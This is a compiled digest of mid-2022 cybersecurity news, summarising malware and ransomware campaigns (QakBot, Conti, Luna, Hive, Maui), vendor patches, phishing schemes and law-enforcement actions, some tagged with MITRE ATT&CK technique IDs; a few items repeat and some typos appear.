    Researchers from Cyble Research Labs discovered new IoCs related to the QakBot malware. QakBot has been leveraging a mass phishing campaign to target victims with a password-protected Zip file which contains an ISO file (T1566.001). The ISO file, when executed by the victim (T1204.002), will show a .lnk file masquerading as a PDF file (T1036.005). If the victim opens the .lnk file, the system is infected with QakBot malware.

    Windows 11 Is Getting a New Security Setting to Block Ransomware Attacks

    Microsoft is rolling out a new security default for Windows 11 that will go a long way to preventing ransomware attacks that begin with password-guessing attacks and compromised credentials. The new account security default on account credentials should help thwart ransomware attacks that are initiated after using compromised credentials or brute-force password attacks to access remote desktop protocol (RDP) endpoints, which are often exposed on the internet. RDP remains the top method for initial access in ransomware deployments, with groups specializing in compromising RDP endpoints and selling them to others for access.

    Google Releases Security Updates for Chrome

    Google has released Chrome version 103.0.5060.134 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates.

    Oracle Releases July 2022 Critical Patch Update

    Oracle has released its Critical Patch Update for July 2022 to address 349 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.  CISA encourages users and administrators to review the Oracle July 2022 Critical Patch Update and apply the necessary updates. 

    How Conti Ransomware Hacked and Encrypted the Costa Rican Government

    Details have emerged on how the Conti ransomware gang breached the Costa Rican government, showing the attack's precision and the speed of moving from initial access to the final stage of encrypting devices. This is the last attack from the Conti ransomware operation before the group transitioned to a different form of organization that relies on multiple cells working with other gangs.

    Hackers Target Ukrainian Software Company Using GoMet Backdoor

    A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found. The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network. "This access could be leveraged in a variety of ways including deeper access or to launch additional attacks, including the potential for software supply chain compromise," Cisco Talos said in a report.

    Atlassian Rolls Out Security Patch for Critical Confluence Vulnerability

    Atlassian recently patched a critical hard-coded credentials vulnerability affecting the Questions for Confluence app for Confluence Server and Confluence Data Center. According to Atlassian, when the app is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username “disabledsystemuser.” While Atlassian says this account is designed to aid administrators that are migrating data from the app to Confluence cloud, the account is created with a hardcoded password and is added to the confluence-users group by default. In turn, this could allow an unauthorized individual to view and edit all non-restricted pages within Confluence.

    Russian Ransomware C2 Network Discovered in Censys Data

    Around June 24 2022, out of over 4.7 million hosts Censys observed in Russia, Censys discovered two Russian hosts containing an exploitation tool, Metasploit, and Command and Control (C2) tool, Deimos C2. Historical analysis indicated one of these Russian hosts also used the tool PoshC2. These tools allow penetration testers and hackers to gain access to and manage target hosts. Censys then used details from the PoshC2 certificate to locate, among hosts elsewhere in the world including the U.S., two additional Russian hosts also using the PoshC2 certificate. Censys data showed these two Russian hosts possessing confirmed malware packages, one of which included a ransomware kit and a file that indicated two additional Russian Bitcoin hosts.

    Justice Department Seizes $500K From North Korean Ransomware Group

    The Department of Justice (DoJ) on Tuesday said it disrupted the activities of a North Korean state-sponsored group, known for deploying the Maui ransomware, and seized $500,000 from the actors in May. These seized funds included ransom payments made by two healthcare providers impacted by the Maui ransomware over the past year. A medical center in Kansas was hit by the Maui ransomware in May 2021 and paid a ransom of $100,000 in Bitcoin to attackers. After the unnamed Kansas-based medical center reported the incident to the FBI, U.S. authorities were able to identify the ransomware family and trace the cryptocurrency back to China-based money launderers.

    This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies

    The 8220 cryptomining group has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021. "8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors," Tom Hegel of SentinelOne said in a Monday report.

    New Luna Ransomware Encrypts Windows, Linux, and ESXi Systems

    A new ransomware family dubbed Luna can be used to encrypt devices running several operating systems, including Windows, Linux, and ESXi systems. Discovered by Kaspersky security researchers via a dark web ransomware forum ad spotted by the company's Darknet Threat Intelligence active monitoring system, Luna ransomware appears to be specifically tailored to be used only by Russian-speaking threat actors.

    FBI Warns of Fake Cryptocurrency Apps Used to Defraud Investors

    Yesterday, the FBI released an alert warning financial institutions and investors about how cybercriminals are creating fraudulent cryptocurrency investment applications to steal funds from US investors. “The FBI has observed cybercriminals contacting US investors, fraudulently claiming to offer legitimate cryptocurrency investment services, and convincing investors to download fraudulent mobile apps, which the cybercriminals have used with increasing success over time to defraud the investors of their cryptocurrency,” says the FBI.

    Experts Uncover New CloudMensis Spyware Targeting Apple macOS Users

    Security researchers at ESET recently disclosed details of a previously undocumented spyware that is being used to target the Apple macOS operating system. Dubbed, CloudMensis, the malware was first discovered in April 2022. Written in Objective-C programming language, CloudMensis is designed to strike both Intel and Apple silicon architectures. According to ESET, the malware exclusively uses public storage servers such as pCloud, Yandex Disk, and Dropbox to receive attacker commands and exfiltrate files.

    Russian SVR Hackers Use Google Drive, Dropbox to Evade Detection

    State-backed hackers part of Russia's Federation Foreign Intelligence Service (SVR) have started using Google Drive legitimate cloud storage service to evade detection. By using online storage services trusted by millions worldwide to exfiltrate data and deploy their malware and malicious tools, the Russian threat actors are abusing that trust to render their attacks exceedingly tricky or even impossible to detect and block.

    APT Groups Target Journalists and Media Organizations Since 2021

    Proofpoint researchers warn that APT groups have been regularly targeting and posing as journalists and media organizations since early 2021. The media sector is a (valuable) target for this category of attackers due to the access its operators have to sensitive information that could be aligned with the interests of state actors. The report published by Proofpoint focuses on the activities conducted by some APT actors linked to China, North Korea, Iran, and Turkey.

    New Netwrix Auditor Bug Could Let Attackers Compromise Active Directory Domain Summary:

    Researchers have disclosed details about a security vulnerability in the Netwrix Auditor application that, if successfully exploited, could lead to arbitrary code execution on affected devices. "Since this service is typically executed with extensive privileges in an Active Directory environment, the attacker would likely be able to compromise the Active Directory domain” (Bishop Fox, 2022) Auditor is an auditing and visibility platform that enables organizations to have a consolidated view of their IT environments, including Active Directory, Exchange, file servers, SharePoint, VMware, and other systems—all from a single console. Netwrix, the company behind the software, claims more than 11,500 customers across over 100 countries, such as Airbus, Virgin, King's College Hospital, and Credissimo, among others.

    Password Recovery Tool Infects Industrial Systems With Sality Malware

    Cybersecurity firm Dragos recently uncovered a campaign that is infecting industrial control systems to create a botnet by leveraging a password “cracking” software for programmable logic controllers (PLCs). Threat actors are advertising the software on various social media websites, with the promise to unlock PLC and HMI (human-machine interface) terminals from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Pro-Face, Allen Bradley, Weintek, ABB, and Panasonic. According to researchers at Dragos, the tool leverages a known vulnerability to retrieve passwords on command. The flaw tracked as CVE-2022-2003 is related to a case of cleartext transmission of sensitive data. If exploited successfully, it could lead to information disclosure and unauthorized changes.

    Attackers Scan 1.6 Million WordPress Sites for Vulnerable

    Security researchers have detected a massive campaign that scanned close to 1.6 million WordPress sites for the presence of a vulnerable plugin that allows uploading files without authentication. The attackers are targeting the Kaswara Modern WPBakery Page Builder, which has been abandoned by its author before receiving a patch for a critical severity flaw tracked as CVE-2021-24284

    Stealthy OpenDocument Malware Deployed Against Latin American Hotels

    In late June 2022, HP Wolf Security isolated an unusually stealthy malware campaign that used OpenDocument text (.odt) files to distribute malware (T1204.002). OpenDocument is an open, vendor-neutral file format compatible with several popular office productivity suites, including Microsoft Office, LibreOffice and Apache OpenOffice. As described in a blog post by Cisco Talos, the campaign targets the hotel industry in Latin America. The targeted hotels are contacted by email with fake booking requests. The malicious document was sent as an email attachment. If the user opens the document, they are shown a prompt asking whether fields with references to other files should be updated. An Excel file opens if they click ‘Yes’ to this cryptic message.

    BlackCat Ransomware Group Deploys Brute Ratel Pen Testing Kit

    vAccording to security company Sophos, the BlackCat ransomware group has begun using Brute Ratel, a penetration testing suite that includes remote access features for attackers. We reported last week, that other threat groups have added Brute Ratel to their toolkit, along with, or instead of the popular Cobalt Strike. Sophos found several of it’s customers were impacted by BlackCat after the group exploited unpatched firewalls and VPNs connected to internal systems (T1190). “The attackers used vulnerabilities reported as early as 2018 to read memory from VPN systems and then log in as an authorized user. They dumped domain controller passwords (T1003.001) along the way, using the latter to create accounts with administrative privileges (T1078.002). They then ran a scanning tool (netscanportable.exe) (T1082, T1049, T1124) to find additional targets and then spread internally via RDP (T1021.001). The attacks targeted both Windows machines and ESXi hypervisor servers.

    Pakistani Hackers Targeting Indian Students in Latest Malware Campaign

    The advanced persistent threat (APT) group known as Transparent Tribe has been attributed to a new ongoing phishing campaign targeting students at various educational institutions in India at least since December 2021. "This new campaign also suggests that the APT is actively expanding its network of victims to include civilian users," Cisco Talos said in a report shared with The Hacker News.

    Microsoft Details App Sandbox Escape Bug Impacting Apple iOS, iPadOS, macOS Devices

    On Wednesday, Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to escape App Sandbox and run unrestrtod on the system. The flaw has been tracked as CVE-2022-26706 and was included in the security updates released by Apple on May 16, 2022. Apple’s App Sandbox is an access control technology that is designed to regulate a third-party app’s access to the system resources and user data. Although the sandbox does not prevent attacks against apps, it does help reduce the impact of a successful attack by restricting the app to a minimum set of privileges it requires to function properly. According to Microsoft, it found specially crafted codes that could escape the sandbox, allowing an attacker to gain elevated privileges on the affected device or even execute malicious commands like installing additional payloads.

    New Lilith Ransomware Emerges with Extortion Site, Lists First Victim

    Researchers from Cyble released details this week on a new ransomware strain called Lilith. The group has posted their first victim on their data leak site, which will be used in double-extortion attacks. It joins RedAlert and 0mega as new members of the ransomware scene. “Lilith is a C/C++ console-based ransomware discovered by JAMESWT and designed for 64-bit versions of Windows. Like most ransomware operations launching today, Lilith performs double-extortions attacks, which is when the threat actors steal data before encrypting devices”.

    VMware Fixed a Flaw in vCenter Server Discovered Eight Months Ago

    VMware addressed a high-severity privilege escalation flaw, tracked as CVE-2021-22048 in vCenter Server‘s IWA (Integrated Windows Authentication) mechanism after eight months since its disclosure. It is unclear why the vulnerability did not receive a patch sooner, but attackers could have leveraged it before the patch was released, especially if exploit code is available. Unfortunately, in previous attacks, we’ve observed threat actors leveraging VMWare to deploy ransomware and disrupt business operations. Ransomware strains targeting hypervisors usually remain encrypted or become corrupted during decryption.

    Socelars-Spyware Analysis

    Socelars is a typical spyware that looks for specific information on the affected system and sends it to the threat actor. It is usually delivered as a download from other malware or by an exploit kit. On static analysis, malware contains insignificant number of imports and maybe it is using dynamic API resolution using LoadLibraryA and GetProcAddress APIs to hide its functionality.

    AIRAVAT Malware Targeting Android Users

    While conducting our routine Open-Source Intelligence (OSINT) research, we came across a Twitter Post wherein the researcher mentioned an opendir website “hxxp://blindajeseguro[.]online,” which was hosting a malicious Android application. Upon analyzing the application, they observed that the Threat Actor (TA) was using the source code of the “Pro” version of AIRAVAT RAT, which the TA may have bought from the AIRAVAT author. AIRAVAT is a multifunctional Android RAT with a web panel without port forwarding. The source code of AIRAVAT’s basic version is available on Github, while the Pro version’s source code is not publicly available.

    Microsoft Warns of Large-Scale AiTM Phishing Attacks Against Over 10,000 Organizations

    Yesterday, Microsoft disclosed a large-scale phishing campaign that targeted over 10,000 organizations since September 2021 by hijacking Office 365’s authentication process even on accounts secured with multi-factor authentication (MFA). "The attackers then used the stolen credentials and session cookies to access affected users' mailboxes and perform follow-on business email compromise (BEC) campaigns against other targets," said Microsoft. The intrusions entailed setting up adversary-in-the-middle (AitM) phishing sites, wherein the adversary deploys a proxy server between a potential victim and the targeted website so that recipients of a phishing email are redirected to lookalike landing pages designed to capture credentials and MFA information.

    CISA Orders Agencies to Patch New Windows Zero-Day Used in Attacks

    As a part of the July 2022 Patch Tuesday, Microsoft patched an actively exploited high severity zero-day that impacts both server and client Windows platforms, including the latest Windows 11 and Windows Server 2022 releases. Tracked as CVE-2022-22047, the flaw is related to a local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem. According to Microsoft, successful exploitation of CVE-2022-22047 could enable a threat actor to gain SYSTEM privileges. Yesterday, CISA added the vulnerability to its list of bugs abused in the wild. Organizations have been given three weeks, until August 2nd, to patch CVE-2022-22047 and block ongoing attacks that could target their systems.

    New ‘Luna Moth’ hackers breach orgs via fake subscription renewals

    “A new data extortion group has been breaching companies to steal confidential information, threatening victims to make the files publicly available unless they pay a ransom. The gang received the name Luna Moth and has been active since at least March in phishing campaigns that delivered remote access tools (RAT) that enable the corporate data theft. Researchers have been tracking the activity of the Luna Moth ransom group, noting that the actor is trying to build a reputation using the name Silent Ransom Group (SRG). In a report earlier this month, Sygnia says that the modus operandi of Luna Moth (also tracked as TG2729) resembles that of a scammer, although the focus is on getting access to sensitive information.

    Microsoft 365 Patches for Windows 7 to End in 2023

    “Microsoft has warned users clinging to Windows 7 and Windows 8.1 that the end really is near, “Windows 7 went out of support in 2020, but Microsoft recognized that many enterprises were quite happy where they were. For a fee, it made Extended Security Updates (ESU) available, which would at least deal with security patches.” Released in 2009, Windows 7 outlived its successor Windows 8 but now the time has come to say goodbye. If Windows is your thing, Microsoft would be more than happy to direct you to 10 or 11. There are also plenty of alternatives out there these days, certainly when compared to 2009.

    Cloud-based Cryptocurrency Miners Targeting GitHub Actions and Azure VMs

    GitHub Actions and Azure virtual machines (VMs) are being leveraged for cloud-based cryptocurrency mining, indicating sustained attempts on the part of malicious actors to target cloud resources for illicit purposes. "Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to gain profit easily," Trend Micro researcher Magno Logan said in a report last week.

    CEO of Dozens of Companies Charged in Scheme to Traffic An Estimated $1bn in Fake Cisco Devices

    The US Department of Justice (DOJ) announced last Friday that a Florida resident named Ron Aksoy has been arrested and charged for allegedly selling thousands of fraudulent and counterfeit Cisco products over the course of 12 years. Aksoy who also goes by Dave Durden is said to have run at least 19 companies formed in New Jersey and Florida, at least 15 Amazon storefronts, roughly 10 eBay storefronts, and multiple other entities with an estimated retail value of over $1 billion. According to court documents, the fake companies imported tens of thousands of counterfeit Cisco networking devices from China and Hong Kong and resold them to customers in the US and overseas, falsely representing the products as new and genuine.

    Lithuanian Energy Firm Disrupted by DDOS Attack

    Lithuanian energy company Ignitis Group was hit by what it described as its “biggest cyber-attack in a decade” on Saturday when numerous distributed denial of service (DDoS) attacks were aimed at it, disrupting its digital services and websites (T1498 - Network Denial of Service). Pro-Russian hacking group Killnet claimed responsibility for the attack on its Telegram channel on Saturday, making this the latest in a series of attacks launched by the group in Lithuania due to that country’s support for Ukraine in the war with Russia.

    Microsoft 365 Patches for Windows 7 to End in 2023

    Microsoft has warned users clinging to Windows 7 and Windows 8.1 that the end really is near, “Windows 7 went out of support in 2020, but Microsoft recognized that many enterprises were quite happy where they were. For a fee, it made Extended Security Updates (ESU) available, which would at least deal with security patches.” Released in 2009, Windows 7 outlived its successor Windows 8 but now the time has come to say goodbye. If Windows is your thing, Microsoft would be more than happy to direct you to 10 or 11. There are also plenty of alternatives out there these days, certainly when compared to 2009.

    Lithuanian Energy Firm Disrupted by DDOS Attack

    “Lithuanian energy company Ignitis Group was hit by what it described as its “biggest cyber-attack in a decade” on Saturday when numerous distributed denial of service (DDoS) attacks were aimed at it, disrupting its digital services and websites (T1498 - Network Denial of Service). Pro-Russian hacking group Killnet claimed responsibility for the attack on its Telegram channel on Saturday, making this the latest in a series of attacks launched by the group in Lithuania due to that country’s support for Ukraine in the war with Russia” (Info Security Magazine, 2022). On July 9th, the company announced on it’s Facebook page that is had managed to limit the attack’s impact on it’s systems, and while no breaches were recorded, the company appears to be dealing with continued attacks. v

    New Phishing Attacks Shame, Scare Victims into Surrendering Twitter, Discord Credentials

    A recent wave of social media phishing schemes doubles down on aggressive scare tactics with phony account-abuse accusations to coerce victims into handing over their login details. Last week alone, Malwarebytes Labs uncovered two phishing scams, targeting Twitter and Discord (a voice, video, and text chat app). The Twitter phishing scam sends users a direct message (DM) flagging their account for use of hate speech and requesting the user authenticate the account to avoid a suspension. Users are then redirected to a fake "Twitter help center," which asks for the user's login credentials.

    New Omega Ransomware Targets Businesses in Double-extortion Attacks

    A new ransomware operation named ‘0mega’ targets organizations worldwide in double-extortion attacks and demands millions of dollars in ransoms. 0mega (spelled with a zero) is a new ransomware operation launched in May 2022 and has attacked numerous victims since then. While it is unclear how files are encrypted by 0mega, the ransomware appends the .Omega extension to the encrypted file’s names and creates ransom notes called DECRYPT-FILES.txt. The ransom notes are said to be customized for each victim and usually contain the company name as well as a description of the data stolen. In some cases, the notes will threaten victims to disclose the attack to business partners and trade associations if a ransom is not paid.

    PyPI Repository Makes 2FA Security Mandatory for Critical Python Projects

    The maintainers of the official third-party software repository for Python have begun imposing a new two-factor authentication (2FA) condition for projects deemed "critical.” "We've begun rolling out a 2FA requirement: soon, maintainers of critical projects must have 2FA enabled to publish, update, or modify them," Python Package Index (PyPI) said in a tweet last week. "Any maintainer of a critical project (both 'Maintainers' and 'Owners') are included in the 2FA requirement," it added.”

    Rozena Backdoor Delivered by Exploiting the Follina Bug

    “Fortinet FortiGuard Labs researchers observed a phishing campaign (T1566.001) that is leveraging the recently disclosed Follina security vulnerability (CVE-2022-30190, CVSS score 7.8) (T1190) to distribute the Rozena backdoor on Windows systems” (Security Affairs, 2022). Follina is a remote code execution vulnerability related to Microsoft Windows Support Diagnostic Tool (MDST). This new backdoor, dubbed Rozena is able to inject a remote shell connection back to the attacker’s machine using weaponized Office documents (T1204.002). Once clicked, the Office Document connects to an external Discord CDN URL (T1090.004) to download an HTML file.

    QNAP Warns of New Checkmate Ransomware Targeting NAS devices

    Taiwan-based network-attached storage (NAS) maker QNAP is warning customers to secure their devices against attacks pushing Checkmate ransomware payloads. Checkmate is a recently discovered ransomware operation that first came into the spotlight in May 2022. According to QNAP, operators of the Checkmate ransomware are targeting internet-exposed QNAP devices with the SMB service enabled and accounts with weak passwords that can easily be cracked in brute-force attacks.

    TrickBot Gang Shifted its Focus on "Systematically" Targeting Ukraine

    Since the Russian invasion, researchers at IBM’s Security X-Force team have uncovered evidence indicating that the Russia-based cybercriminal syndicate “Trickbot group” has resorted to systematically targeting Ukraine - an unprecedented shift as the group had not previously targeted Ukraine. TrickBot, aka ITG23, Gold Blackburn, and Wizard Spider, is a financially motivated cybercrime gang that is known for the development of the TrickBot banking trojan. In the past, groups like Conti have used the banking trojan to siphon account credentials and deploy ransomware payloads on victims’ systems.

    Large-scale Cryptomining Campaign is Targeting the NPM JavaScript Package Repository

    Researchers from Checkmarx released details on a large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. They have dubbed the campaign “CuteBoi”, as a tribute to the “cute” username hardcoded in many of the packages’ configuration files and to one of the non-random NPM usernames the Attacker is using, “cloudyboi12”. “Threat actors behind the campaign published 1,283 malicious modules in the repository and used over 1,000 different user accounts. The researchers uncovered the supply chain attack after noticing a burst of suspicious NPM users and packages being automatically created” (Security Affairs, 2022). Over 1200 npm packages were released to the registry by thousands of different user accounts. The process was automated and included the ability to pass NPMs 2FA challenge.

    Microsoft Rolls Back Decision to Block Office Macros by Default

    While Microsoft announced earlier this year that it would block VBA macros on downloaded documents by default, Redmond said on Thursday that it will roll back this change based on "feedback" until further notice. The company has also failed to explain the reason behind this decision and is yet to publicly inform customers that VBA macros embedded in malicious Office documents will no longer be blocked automatically in Access, Excel, PowerPoint, Visio, and Word.

    FBI and MI5 Bosses Warn of “Massive” China Threat

    The leaders of MI5 and the FBI shared the stage for the first time yesterday in a bid to warn business leaders and academics of the seriousness of the espionage threat from China. British intelligence boss Ken McCallum explained that the Communist Party and the government it controls has been engaged for years in attempts to steal “world-leading expertise, technology, research and commercial advantage” to boost China’s global standing. China is using various methods to steal intellectual property from foreign countries including having Chinese spies operating undercover, M&A and “tech transfers” from Western to Chinese firms, and are co-opting local contacts who are sometimes oblivious to what they are doing.

    Ransomware, Hacking Groups Move from Cobalt Strike to Brute Ratel

    Researchers from Palo Alto’s Unit 42 warn this week that cybercriminals are moving away from Cobalt Strike to the newer Brute Ratel post-exploitation toolkit. The move away from the popular Cobalt Strike toolkit allows them to better evade detection by Endpoint Detection and Response (EDR) and antivirus solutions. “Corporate cybersecurity teams commonly consist of employees who attempt to breach corporate networks (red team) and those who actively defend against them (blue team). Both teams then share notes after engagements to strengthen the cybersecurity defenses of a network. For years, one of the most popular tools in red team engagements has been Cobalt Strike, a toolkit allowing attackers to deploy "beacons" on compromised devices to perform remote network surveillance or execute commands” .

    Cisco Expressway Series and Cisco TelePresence Video Communication Server Vulnerabilities

    On Wednesday, Cisco released security updates to address multiple vulnerabilities in the API and the web-based management interface of Cisco Expressway series and Cisco TelePresence Video Communication Server (VCS). The most severe flaw, tracked as CVE-2022-20812 (CVSS: 9), is related to an arbitrary file overwrite vulnerability in the cluster database API of Cisco Expressway Series and Cisco TelePresence VCS. Successful exploitation could allow an authenticated, remote attacker with Administrator read-write privileges on the application to conduct path traversal attacks on an affected device and overwrite files on the operating system as a root user.

    OpenSSL Releases Patch for High-Severity Bug that Could Lead to RCE Attacks

    OpenSSL released security fixes to address a high-severity bug in the cryptographic library that could potentially lead to remote code execution under certain scenarios. OpenSSL is a general-purpose cryptography library that offers open-source implementation of the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, enabling users to generate private keys, create certificate signing requests (CSRs), install SSL/TLS certificates.

    Bitter APT Hackers Continue to Target Bangladesh Military Entities

    Military entities located in Bangladesh continue to be at the receiving end of sustained cyberattacks by an advanced persistent threat tracked as Bitter. "Through malicious document files and intermediate malware stages the threat actors conduct espionage by deploying Remote Access Trojans," cybersecurity firm SECUINFRA said in a new write-up published on July 5. The findings from the Berlin-headquartered company build on a previous report from Cisco Talos in May, which disclosed the group's expansion in targeting to strike Bangladeshi government organizations with a backdoor called ZxxZ.

    Hive Ransomware Upgrades to Rust for More Sophisticated Encryption Method

    Microsoft recently published a blog post uncovering a new variant of the Hive ransomware. According to Microsoft’s Threat Intelligence Center, the Hive ransomware-as-a-service has fully migrated to the Rust programming language, allowing it to adopt a more sophisticated encryption method. "Instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes the sets to the root of the drive it encrypts, both with .key extension," MSTIC explained.

    US Govt Warns of Maui Ransomware Attacks Against Healthcare Orgs

    The FBI, CISA, and the U.S. Treasury Department issued today a joint advisory warning of North-Korean-backed threat actors using Maui ransomware in attacks against Healthcare and Public Health (HPH) organizations” (Bleeping Computer, 2022). The advisory comes after the FBI detected multiple Maui ransomware attacks against the healthcare sector starting in May 2021. According to the FBI, North Korean state-sponsored threat actors are using the Maui ransomware to target organizations responsible for healthcare services. Specifically, the threat actors are looking to encrypt electronic health records services, diagnostics services, imaging services, and intranet services. In some of these cases, cyber incidents impacted services provided by HPH sector organizations for prolonged periods of time, which could result in public safety concerns and even death.

    NPM Supply-Chain Attack Impacts Hundreds of Websites and Apps

    An NPM supply-chain attack dating back to December 2021 used dozens of malicious NPM modules containing obfuscated Javascript code to compromise hundreds of downstream desktop apps and websites. As researchers at supply chain security firm ReversingLabs discovered, the threat actors behind this campaign (known as IconBurst) used typosquatting to infect developers looking for very popular packages, such as umbrellajs and ionic.io NPM modules. If fooled by the very similar module naming scheme, they would add the malicious packages designed to steal data from embedded forms (including those used for sign-in) to their apps or websites.

    Google Patches New Chrome Zero-Day Flaw Exploited in Attacks

    Yesterday, Google released Chrome 103.0.5060.114 to address a high-severity zero-day vulnerability that attackers are currently exploiting in the wild. Tracked as CVE-2022-2294, the flaw is related to a heap-based buffer overflow weakness in the WebRTC (Web Real-Time Communications) component of Chrome. For its part, WebRTC is a free and open-source project that enables real-time voice, text, and video communications capabilities between web browsers and devices. While Google has yet to share technical details about the bug, the impact of successful heap overflow exploitation can range from program crashes and arbitrary code execution to bypassing security solutions if code execution is achieved during the attack.

    Hacker Claims to Have Stolen Data on 1 Billion Chinese Citizens

    An anonymous threat actor is selling several databases they claim to contain more than 22 terabytes of stolen information on roughly 1 billion Chinese citizens for 10 bitcoins (approximately $195,000). The announcement was posted on a hacker forum by someone using the handle 'ChinaDan,' saying that the information was leaked from the Shanghai National Police (SHGA) database. Based on the information they shared regarding the allegedly stolen data, the databases contain Chinese national residents' names, addresses, national ID numbers, contact info numbers, and several billion criminal records.

    ZuoRAT is a Sophisticated Malware that Mainly Targets SOHO Routers

    Researchers from Lumen released details on a new malware campaign leveraging infected SOHO routers to target victims in North America and Europe. The malware called ZuoRat, shows a high level of sophistication and samples date back to 2020. Lumen researchers believe the malware may have attribution to a state sponsored threat actor, due to it’s complexity. ”SOHO is short for small office/home office and SOHO routers are hardware devices that route data from a local area network (LAN) to another network connection. Modern SOHO routers have almost the same functions as home broadband routers, and small businesses tend to use the same models. Some vendors also sell routers with advanced security and manageability features, but most SOHO devices are only monitored in exceptional cases.

    US Publisher Macmillan Confirms Cyberattack Forced Systems Offline

    Macmillan, one of the largest book publishers in the U.S., said it has been hit by a cyberattack that forced it to shut down its IT systems. Macmillan spokesperson Erin Coffey told TechCrunch that the company recently experienced a “security incident” that “involved the encryption of certain files on our network.” The attack struck the company on June 25, according to reports, and also impacted its U.K. branch, known as Pan Macmillan.

    Korean Cybersecurity Agency Released a Free Decryptor for Hive Ransomware

    South Korean cybersecurity agency KISA recently published a free decryptor tool that can be used to recover files encrypted by the Hive ransomware (version 1 through version 4). Users can find step-by-step instructions on how to recover their encrypted data using the manual provided in the announcement by the KISA agency. The news comes after a team of researchers at Kookmin University (South Korea) discovered a flaw in the encryption algorithm used by Hive Ransomware, enabling them to decrypt data without knowing the private key used by the gang to encrypt files.

    Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers

    A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign. "The updates include the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday. "The group has actively updated its techniques and payloads over the last year." 8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the Rocke cybercrime group in their attacks.

    Xloader Returns With New Infection Technique

    Xloader is a rebranded version of the Formbook stealer. It is designed as a malicious tool to steal credentials from different web browsers, collect screenshots, monitor and log keystrokes from the victim’s machine, and send them to Command and Control (C&C) server. Typically, Xloader spreads via spam emails that trick victims into downloading a malicious attachment file, such as MS Office documents, PDF documents, etc. During Cybable’s routine threat-hunting exercise, the team came across a Twitter post wherein a researcher mentioned an interesting infection chain of Xloader malware.

    Microsoft Exchange Servers Worldwide Backdoored with New Malware

    Attackers used a newly discovered malware to backdoor Microsoft Exchange servers belonging to government and military organizations from Europe, the Middle East, Asia, and Africa. The malware was dubbed SessionManager by security researchers at Kaspersky, who first spotted it in early 2022. The malware is a malicious native-code module for Microsoft's Internet Information Services (IIS) web server software.

    FBI Alert: MedusaLocker

    Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

    AstraLocker 2.0 Infects Users Directly From Word Attachments

    A lesser-known ransomware strain called AstraLocker has recently released its second major version, and according to threat analysts, its operators engage in rapid attacks that drop its payload directly from email attachments. This approach is quite unusual as all the intermediate steps that typically characterize email attacks are there to help evade detection and minimize the chances of raising red flags on email security products. According to ReversingLabs, which has been following AstraLocker operations, the adversaries don’t seem to care about reconnaissance, evaluation of valuable files, and lateral network movement. Instead, they are performing "smash-n-grab" attacks to his immediately hit with maximum force aiming for a quick payout.

    Ukraine Arrests Cybercrime Gang Operating Over 400 Phishing Sites

    Ukraine’s cyberpolice force recently arrested nine members of a criminal group that operated over 400 phishing websites pretending to be legitimate EU portals offering financial assistance to Ukrainians. “The threat actors used forms on the site to steal visitors' payment card data and online banking account credentials and perform fraudulent, unauthorized transactions like moving funds to accounts under their control” (Bleeping Computer, 2022). In total, this cybercrime operation was able to steal approximately $3,360,000, from roughly 5,000 victimized citizens. While it is unclear how the victims ended up on these phishing sites, the cybercriminals could have used various means including SEO poisoning, direct messaging, email, and scam posts on social media platforms.

    Xfiles Info-Stealing Malware Adds Support for Follina Delivery

    The XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. The flaw, discovered as a zero-day at the end of May and fixed with Microsoft’s Windows update on June 14, enables the execution of PowerShell commands simply by opening a Word document.

    Deepfakes and Stolen PII Utilized to Apply for Remote Work Positions — FBI

    The FBI Internet Crime Complaint Center (IC3) warns of an increase in complaints reporting the use of deepfakes and stolen Personally Identifiable Information (PII) to apply for a variety of remote work and work-at-home positions. Deepfakes include a video, an image, or recording convincingly altered and manipulated to misrepresent someone as doing or saying something that was not actually done or said.

    Ransomware Suspected in Wiltshire Farm Foods Attack

    A leading UK producer of frozen ready meals has revealed its systems are currently down after experiencing a serious cyber-attack. Wiltshire Farm Foods said on Sunday that it is “currently experiencing severe difficulties” with its computer systems. “If you are expecting a delivery this week (w/c 27th June) or have other concerns, please contact your local depot,” it continued. Wiltshire says their systems are currently not working, and they will be unable to make deliveries for the next few days. While the company released little details about the attack, security experts noted the high likelihood of a ransomware attack on social media.

    AMD Investigates RansomHouse Hack Claims, Theft of 450GB Data

    Semiconductor giant AMD says they are investigating a cyberattack after the RansomHouse gang claimed to have stolen 450 GB of data from the company last year. RansomHouse is a data extortion group that breaches corporate networks, steals data, and then demands a ransom payment to not publicly leak the data or sell it to other threat actors. For the past week, RansomHouse has been teasing on Telegram that they would be selling the data for a well-known three-letter company that starts with the letter A.

